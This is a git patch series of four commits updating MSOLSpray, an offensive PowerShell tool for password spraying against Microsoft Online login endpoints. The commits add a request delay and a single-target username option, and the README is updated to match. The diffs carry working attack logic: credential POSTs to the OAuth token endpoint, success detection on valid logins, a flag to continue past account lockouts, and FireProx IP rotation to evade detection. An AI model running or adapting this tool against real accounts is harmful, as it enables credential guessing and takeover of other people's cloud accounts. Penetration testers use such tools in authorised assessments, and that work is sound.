From 0a6570968cd0450fc7531b093520ecc5fa1e9030 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:33:22 -0500 Subject: [PATCH 1/4] Update MSOLSpray.ps1 Added delay option --- MSOLSpray.ps1 | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/MSOLSpray.ps1 b/MSOLSpray.ps1 index 3327392..9c2afc4 100644 --- a/MSOLSpray.ps1 +++ b/MSOLSpray.ps1 @@ -1,4 +1,4 @@ -function Invoke-MSOLSpray{ +function Invoke-MSOLSpray{ <# .SYNOPSIS @@ -21,6 +21,10 @@ A single password that will be used to perform the password spray. + .PARAMETER Delay + + A number in seconds to delay between requests. + .PARAMETER OutFile A file to output valid results to. @@ -62,6 +66,10 @@ [string] $Password = "", + [Parameter(Position = 2, Mandatory = $False)] + [Int] + $Delay = 10, + # Change the URL if you are using something like FireProx [Parameter(Position = 3, Mandatory = $False)] [string] @@ -94,6 +102,9 @@ # Setting up the web request $BodyParams = @{'resource' = 'https://graph.windows.net'; 'client_id' = '1b730954-1685-4b74-9bfd-dac224a7b894' ; 'client_info' = '1' ; 'grant_type' = 'password' ; 'username' = $username ; 'password' = $password ; 'scope' = 'openid'} $PostHeaders = @{'Accept' = 'application/json'; 'Content-Type' = 'application/x-www-form-urlencoded'} + if ($Delay) { + Start-Sleep -Seconds $Delay + } $webrequest = Invoke-WebRequest $URL/common/oauth2/token -Method Post -Headers $PostHeaders -Body $BodyParams -ErrorVariable RespErr # If we get a 200 response code it's a valid cred @@ -202,4 +213,4 @@ Write-Output "Results have been written to $OutFile." } } -} \ No newline at end of file +} From eaf5c494d8e5021e0d3a863f00b963108c60e100 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:46:11 -0500 Subject: [PATCH 2/4] Update MSOLSpray.ps1 Added delay and single username --- MSOLSpray.ps1 | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/MSOLSpray.ps1 b/MSOLSpray.ps1 index 9c2afc4..6264a86 100644 --- a/MSOLSpray.ps1 +++ b/MSOLSpray.ps1 @@ -17,6 +17,10 @@ function Invoke-MSOLSpray{ UserList file filled with usernames one-per-line in the format "user@domain.com" + .PARAMETER UserName + + A single user to spray in the format "user@domain.com". + .PARAMETER Password A single password that will be used to perform the password spray. @@ -39,10 +43,10 @@ function Invoke-MSOLSpray{ .EXAMPLE - C:\PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 + C:\PS> Invoke-MSOLSpray -UserName user@company.com -Password Winter2020 Description ----------- - This command will use the provided userlist and attempt to authenticate to each account with a password of Winter2020. + This command will use the provided username and attempt to authenticate to with a password of Winter2020. .EXAMPLE @@ -64,9 +68,13 @@ function Invoke-MSOLSpray{ [Parameter(Position = 2, Mandatory = $False)] [string] + $UserName = "", + + [Parameter(Position = 3, Mandatory = $False)] + [string] $Password = "", - [Parameter(Position = 2, Mandatory = $False)] + [Parameter(Position = 4, Mandatory = $False)] [Int] $Delay = 10, @@ -81,7 +89,12 @@ function Invoke-MSOLSpray{ ) $ErrorActionPreference= 'silentlycontinue' - $Usernames = Get-Content $UserList + + if ($UserName -ne "") { + $Usernames = $UserName + } else { + $Usernames = Get-Content $UserList + } $count = $Usernames.count $curr_user = 0 $lockout_count = 0 From 834dfda5f1874b703a44b352f4f67b56c7a5edd5 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:48:29 -0500 Subject: [PATCH 3/4] Update README.md Updated options --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index aa7be2f..4526b05 100644 --- a/README.md +++ b/README.md @@ -25,8 +25,10 @@ Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 ### Invoke-MSOLSpray Options ``` UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" +UserName - Single username to spray in the format "user@domain.com" Password - A single password that will be used to perform the password spray. OutFile - A file to output valid results to. Force - Forces the spray to continue and not stop when multiple account lockouts are detected. URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +Delay - A delay between attempts in seconds. ``` From 99a52a00d96e0ef689a66bc611cb8c68140c5cb0 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:53:12 -0500 Subject: [PATCH 4/4] Update MSOLSpray.ps1 --- MSOLSpray.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/MSOLSpray.ps1 b/MSOLSpray.ps1 index 6264a86..70d473a 100644 --- a/MSOLSpray.ps1 +++ b/MSOLSpray.ps1 @@ -76,7 +76,7 @@ function Invoke-MSOLSpray{ [Parameter(Position = 4, Mandatory = $False)] [Int] - $Delay = 10, + $Delay = 0, # Change the URL if you are using something like FireProx [Parameter(Position = 3, Mandatory = $False)]